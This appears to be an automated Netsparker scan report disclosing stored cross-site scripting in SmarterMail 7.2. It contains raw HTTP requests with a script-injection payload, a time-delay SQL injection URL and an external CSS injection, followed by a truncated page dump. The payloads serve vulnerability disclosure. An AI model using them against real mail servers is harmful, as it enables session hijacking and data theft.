SmarterMail 7.2, XSS, Stored Cross Site Scripting, DEFAULT INSTALLATION

Netsparker - Scan Report Summary
TARGET URL
http://vulnerable.smartermail.7.x.host:9998/Main/frmStoredFiles.aspx
SCAN DATE
10/2/2010 8:54:18 PM
REPORT DATE
10/3/2010 11:52:21 AM
SCAN DURATION
13:31:54.4531250

Total Requests

285554

Average Speed

5.86 req/sec.
21
identified
10
confirmed
0
critical
3
informational

SCAN SETTINGS

Scan Settings
PROFILE
Previous Settings
ENABLED ENGINES
Static Tests, Find Backup Files, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
Proxy
Authentication
Scheduled

VULNERABILITIES

Vulnerabilities
IMPORTANT
67 %
MEDIUM
10 %
LOW
10 %
INFORMATION
14 %
Permanent Cross-site Scripting

Permanent Cross-site Scripting

5 TOTAL
IMPORTANT
CONFIRMED
5

Netsparker confirmed this vulnerability by analyzing the execution of injected JavaScript.

Permanent XSS (Cross-site Scripting) allows an attacker to execute dynamic scripts (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly and to steal the user's credentials. This happens because the input entered by the user has been interpreted by HTML/Javascript/VbScript within the browser.

Permanent means that the attack will be stored in the back-end system. In normal XSS attacks an attack needs to e-mail the victim but in a permanent XSS an attacker can just execute the attack and wait for users to see the affected page. As soon as someone visits the page, the attacker's stored payload will get executed.

XSS targets the users of the application instead of the server. Although this is a limitation, since it only allows attackers to hijack other users' session the attacker might attack an administrator to gain full control over the application.

Impact

Permanent XSS is a dangerous issue that has many exploitation vectors, some of which includes:

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

- /Main/frmSyncMLList.aspx

/Main/frmSyncMLList.aspx CONFIRMED

http://vulnerable.smartermail.7.x.host:9998/Main/frmSyncMLList.aspx?tab=%27;WAITFOR%20DELAY%20%270:0:25%27--

Injection URL

http://vulnerable.smartermail.7.x.host:9998/Main/frmPopupAddToOutlook.aspx

Injection Request

POST /Main/frmPopupAddToOutlook.aspx HTTP/1.1
Referer: http://vulnerable.smartermail.7.x.host:9998/Main/frmPopupAddToOutlook.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: vulnerable.smartermail.7.x.host:9998
Cookie: ASP.NET_SessionId=e25dkk45nuvkgrr4d1exuxrn
Content-Length: 686
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

__EVENTTARGET=ctl00%24BrPH%24btnOK&__EVENTARGUMENT=3&__LASTFOCUS=3&__VIEWSTATE=%2fwEPDwUKLTE0NTYxMzUxOQ8WBB4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlFgJmD2QWAgIBD2QWBgIFDxYCHgdWaXNpYmxlaGQCBw9kFgJmD2QWAgIBDxYCHwJoFgICAQ8WAh4EVGV4dGVkAgsPZBYCAgEPZBYGAgEPZBYCAgEPZBYCZg8QZA8WAmYCARYCEAUVT3V0bG9vayAyMDA3IG9yIGxhdGVyBQMxLjFnEAUMT3V0bG9vayAyMDAzBQMxLjBnZGQCAg9kFgICAQ9kFgICAg8PFgIfAwUXT3V0bG9vayBTeW5jIENvbm5lY3Rpb25kZAIDD2QWAgIBD2QWAgICDw8WAh8DZWRkZMetqs359%2fzAbUldioYQNOub7SL6&ctl00%24MPH%24lstStsVersion_SettingDropDown=1.1&ctl00%24MPH%24txtDescription_SettingText='%22--%3e%3cscript%3enetsparker(0x0038D2)%3c%2fscript%3e&ctl00%24MPH%24txtStsDisplayName_SettingText=Ronald+Smith

Identification Request

GET /Main/frmSyncMLList.aspx?tab=%27;WAITFOR%20DELAY%20%270:0:25%27-- HTTP/1.1
Referer: http://vulnerable.smartermail.7.x.host:9998/Main/frmStsSync.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: vulnerable.smartermail.7.x.host:9998
Cookie: ASP.NET_SessionId=e25dkk45nuvkgrr4d1exuxrn
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Injection Response

HTTP/1.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 06:31:53 GMT
X-AspNet-Version: 2.0.50727
Content-Encoding:
X-Compressed-By: HttpCompress
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 3002
Connection: Close


Identification Response

HTTP/1.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 06:52:57 GMT
X-AspNet-Version: 2.0.50727
Content-Encoding:
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 312019
Connection: Close




<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
Synchronization - hoytllc.com - SmarterMail
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Mail/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
<meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head>
<body class="" dir="ltr">
<form method="post" action="frmSyncMLList.aspx?tab='%3bWAITFOR+DELAY+'0%3a0%3a25'--" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJMjIxNTE5NTQ3DxYGHhBfX19SZXN1bHRGYWlsdXJlZR4QX19fUmVzdWx0U3VjY2Vzc2UeBF9zR0ZnFgJmD2QWAgIBD2QWBgIEDxYEHgVzdHlsZQUNZGlzcGxheTpub25lOx4HVmlzaWJsZWhkAgYPFgIfBGhkAgcPZBYCZg9kFgICAQ8WAh8EaBYCAgEPFgIeBFRleHRlZBgGBRdjdGwwMCRUUEgkVGFiU3RyaXAkVGFiMw8y2wsAAQAAAP////8BAAAAAAAAAAQBAAAA4gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5EaWN0aW9uYXJ5YDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAdWZXJzaW9uCENvbXBhcmVyCEhhc2hTaXplDUtleVZhbHVlUGFpcnMAAwADCJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0I5gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV1bXQUAAAAJAgAAAAcAAAAJAwAAAAQCAAAAkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQAAAAAHAwAAAAABAAAABQAAAAPkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQT8////5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0CAAAAA2tleQV2YWx1ZQECBgUAAAAHRW5hYmxlZAgBAQH6/////P///wYHAAAABFRleHQKAfj////8////BgkAAAAKUmVzb3VyY2VJRAYKAAAAC0BBY3RpdmVTeW5jAfX////8////BgwAAAAIU2VsZWN0ZWQIAQAB8/////z///8GDgAAAApQYWdlVmlld0lEBg8AAAAMcHZBY3RpdmVTeW5jC2QFF2N0bDAwJE1QSCRncmRBY3RpdmVTeW5jDwUkVHJ1ZXxUcnVlfHxGYWxzZXxUcnVlfHxGYWxzZXxGYWxzZXwwZAUTY3RsMDAkTVBIJGdyZFN5bmNNTA8FJFRydWV8VHJ1ZXx8RmFsc2V8VHJ1ZXx8RmFsc2V8RmFsc2V8MGQFGWN0bDAwJE1QSCRncmRBZGRUb091dGxvb2sPBSRUcnVlfFRydWV8fEZhbHNlfFRydWV8fEZhbHNlfEZhbHNlfDBkBRdjdGwwMCRUUEgkVGFiU3RyaXAkVGFiMQ8y0wsAAQAAAP////8BAAAAAAAAAAQBAAAA4gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5EaWN0aW9uYXJ5YDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAdWZXJzaW9uCENvbXBhcmVyCEhhc2hTaXplDUtleVZhbHVlUGFpcnMAAwADCJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0I5gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV1bXQUAAAAJAgAAAAcAAAAJAwAAAAQCAAAAkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQAAAAAHAwAAAAABAAAABQAAAAPkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQT8////5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0CAAAAA2tleQV2YWx1ZQECBgUAAAAHRW5hYmxlZAgBAQH6/////P///wYHAAAABFRleHQKAfj////8////BgkAAAAKUmVzb3VyY2VJRAYKAAAAB0BTeW5jTUwB9f////z///8GDAAAAAhTZWxlY3RlZAgBAAHz/////P///wYOAAAAClBhZ2VWaWV3SUQGDwAAAAhwdlN5bmNNTAtkBRdjdGwwMCRUUEgkVGFiU3RyaXAkVGFiMg8y3wsAAQAAAP////8BAAAAAAAAAAQBAAAA4gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5EaWN0aW9uYXJ5YDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAdWZXJzaW9uCENvbXBhcmVyCEhhc2hTaXplDUtleVZhbHVlUGFpcnMAAwADCJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0I5gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV1bXQUAAAAJAgAAAAcAAAAJAwAAAAQCAAAAkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQAAAAAHAwAAAAABAAAABQAAAAPkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQT8////5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0CAAAAA2tleQV2YWx1ZQECBgUAAAAHRW5hYmxlZAgBAQH6/////P///wYHAAAABFRleHQKAfj////8////BgkAAAAKUmVzb3VyY2VJRAYKAAAADUBBZGRUb091dGxvb2sB9f////z///8GDAAAAAhTZWxlY3RlZAgBAAHz/////P///wYOAAAAClBhZ2VWaWV3SUQGDwAAAA5wdkFkZFRvT3V0bG9vawtkNVpa7ObeR3nu63bHyNVuxyu97yk=" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=lFfe_wSSLYBiWo0hdQTqNA2&amp;t=633802452069218315" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=9LtTppofNdzfPwjqAv6ngOF_m3Ok_PFqwhuv90rOoA_SHM2fVCRbipJCEnE9OMFtjNNZaXF1BttRFjWpHbAPstnprDdIVLeDszcVmLsdfwM1&amp;t=ffffffff8fb8c655" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYAD0iIeAHZBtPh1mybNd0fzbzD1H1EGEbNX_3WW4l9J01&amp;t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYxlutgliktFrtyUOE-2vtH5p7RzBBFeKiwavJVGKo3xk1&amp;t=ffffffffec2d9970" type="text/javascript"></script>

<script type="text/javascript">
self.EnableAnimations = false;
</script>

<script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB60CF5B830100_1.6.3925.24513_&fileMask="></script>
<script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', document.getElementById('aspnetForm'));
Sys.WebForms.PageRequestManager.getInstance()._updateControls(['tctl00$UpdatePanel1','tctl00$MPH$UpdatePanel1','tctl00$MPH$UP1','tctl00$MPH$UpdatePanel2'], ['ctl00$BPH$btnDeleteAddToOutlook','ctl00$BPH$btnDeleteSyncML','ctl00$BPH$btnDeleteActiveSync'], [], 90);
//]]>
</script>


<div id="ctl00_TitleBar_HeaderPanel" class="PageTitle">
<div class="RoundedPageTitleLeft">
<div id="PageTitle" class="PageTitleText">
Synchronization
</div>
</div>
</div>

<div id="ctl00_ButtonRow" class="ButtonBar">
<div class="ButtonBarLeft">

<div id="divSyncML" style="display: none" class="TogglableButtons">
<div id="ctl00_BPH_btnEditSyncML" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoEdit_ctl00_BPH_btnEditSyncML(); return false;"><span class="BBInner">Edit</span></a></div>
<div id="ctl00_BPH_btnDeleteSyncML" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoDeleteQuery_ctl00_BPH_btnDeleteSyncML(); return false;"><span class="BBInner">Delete</span></a></div>
</div>
<div id="divAddToOutlook" style="display:none;" class="TogglableButtons">
<div id="ctl00_BPH_btnEditAddToOutlook" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoEdit_ctl00_BPH_btnEditAddToOutlook(); return false;"><span class="BBInner">Edit</span></a></div>
<div id="ctl00_BPH_btnDeleteAddToOutlook" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoDeleteQuery_ctl00_BPH_btnDeleteAddToOutlook(); return false;"><span class="BBInner">Delete</span></a></div>
</div>
<div id="divActiveSync" style="display: none" class="TogglableButtons">
<div id="ctl00_BPH_btnEditActiveSync" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoEdit_ctl00_BPH_btnEditActiveSync(); return false;"><span class="BBInner">Edit</span></a></div>
<div id="ctl00_BPH_btnDeleteActiveSync" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoDeleteQuery_ctl00_BPH_btnDeleteActiveSync(); return false;"><span class="BBInner">Delete</span></a></div>
</div>

</div>
<div class="ButtonBarRight">

</div>
<div class="ButtonBarClear">
<div class="ie6fix">
&nbsp;</div>
</div>
</div>



<span id="ctl00_UpdatePanel1">

</span>
<div id="ctl00_trTabStrip" class="TabStripContainer">


<!-- HyperTabStrip -->
<div class='htsTabStrip htsTabBar'><ul id='ctl00_TPH_TabStrip'>
<li class='htsItem htsFirst htsSelected' id='ctl00_TPH_TabStrip_Tab2'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>Add to Outlook</span></span></a></li>
<li class='htsItem ' id='ctl00_TPH_TabStrip_Tab1'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>SyncML</span></span></a></li>
<li class='htsItem htsLast' id='ctl00_TPH_TabStrip_Tab3'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>ActiveSync</span></span></a></li>
</ul>
<input type="hidden" name="ctl00$TPH$TabStrip$SelectedTab" id="ctl00_TPH_TabStrip_SelectedTab" value="ctl00_TPH_TabStrip_Tab2" /><div class='htsClear'><div class='ie6fix'>&nbsp;</div></div></div>


</div>
<div id="Scrollable" class="ContentDiv">

<span id="ctl00_MPH_HyperContextMenu1">
<!-- HyperMenu -->
<div class='hmMenuBar '><div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmMenu hmMenuBar hmSub hmContext hmList' id='ctl00_MPH_ctl03' name='ctl00$MPH$ctl03' style='z-index:800'>
<li class='hmItem hmFirst' id='ctl00_MPH_ctl03_hm0' style='z-index: 800'><a class='hmA' href='#'>Edit</a></li>
<li class='hmItem hmLast' id='ctl00_MPH_ctl03_hm1' style='z-index: 800'><a class='hmA' href='#'>Delete</a></li>
</ul>
<div class='hmScrollDown'></div></div>
</div>
</span>
<span id="ctl00_MPH_HyperContextMenu2">
<!-- HyperMenu -->
<div class='hmMenuBar '><div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmMenu hmMenuBar hmSub hmContext hmList' id='ctl00_MPH_ctl04' name='ctl00$MPH$ctl04' style='z-index:800'>
<li class='hmItem hmFirst' id='ctl00_MPH_ctl04_hm0' style='z-index: 800'><a class='hmA' href='#'>Edit</a></li>
<li class='hmItem hmLast' id='ctl00_MPH_ctl04_hm1' style='z-index: 800'><a class='hmA' href='#'>Delete</a></li>
</ul>
<div class='hmScrollDown'></div></div>
</div>
</span>
<span id="ctl00_MPH_HyperContextMenu3">
<!-- HyperMenu -->
<div class='hmMenuBar '><div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmMenu hmMenuBar hmSub hmContext hmList' id='ctl00_MPH_ctl05' name='ctl00$MPH$ctl05' style='z-index:800'>
<li class='hmItem hmFirst' id='ctl00_MPH_ctl05_hm0' style='z-index: 800'><a class='hmA' href='#'>Edit</a></li>
<li class='hmItem hmLast' id='ctl00_MPH_ctl05_hm1' style='z-index: 800'><a class='hmA' href='#'>Delete</a></li>
</ul>
<div class='hmScrollDown'></div></div>
</div>
</span>

<!-- HyperMultiPage -->
<div class='' id='ctl00_MPH_MP1'>
<input type="hidden" name="ctl00$MPH$VisiblePage" id="ctl00_MPH_VisiblePage" value="ctl00_MPH_pvAddToOutlook" />
<div id='ctl00_MPH_pvAddToOutlook' class='' >
<span id="ctl00_MPH_pvAddToOutlook">
<div id="ctl00_MPH_UpdatePanel1">


<div class="HyperGridWrapper" id="ctl00_MPH_grdAddToOutlook">
<div class="HyperGrid">
<table class="HyperGrid" id="ctl00_MPH_grdAddToOutlook_Table">
<thead>
<tr><th scope="col" class="showsel lc CheckBoxColumn" style="overflow: hidden"><input type="checkbox" id="ctl00_MPH_grdAddToOutlookCheckAll" name="ctl00$MPH$grdAddToOutlookCheckAll" /></th><th scope="col" style="overflow: hidden">Outlook Display Name</th><th scope="col" class="leftpad" style="overflow: hidden">Description</th><th scope="col" class="rc ac nw leftpad" style="overflow: hidden">Last Sync</th></tr>
</thead>
<tbody>
<tr class="firstrow"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_grdAddToOutlook_CB64_e2I4ZmFmNTAxLWY0MDgtNDFhNS1iNmY1LTBkMzVjMTQzMjdiY30-" name="ctl00_MPH_grdAddToOutlook_CB64_e2I4ZmFmNTAxLWY0MDgtNDFhNS1iNmY1LTBkMzVjMTQzMjdiY30-" /></td><td></td><td class="leftpad">Outlook Sync Connection</td><td class="rc ac nw leftpad">10/2/2010</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox..
- /Main/frmNote.aspx

/Main/frmNote.aspx CONFIRMED

http://vulnerable.smartermail.7.x.host:9998/Main/frmNote.aspx?nsextt=//example.com/netsparker0x005D36.css

Injection URL

http://vulnerable.smartermail.7.x.host:9998/Main/frmPopupContactCategories.aspx

Injection Request

POST /Main/frmPopupContactCategories.aspx HTTP/1.1
Referer: http://vulnerable.smartermail.7.x.host:9998/Main/frmPopupContactCategories.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: vulnerable.smartermail.7.x.host:9998
Cookie: ASP.NET_SessionId=e25dkk45nuvkgrr4d1exuxrn
Content-Length: 443
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

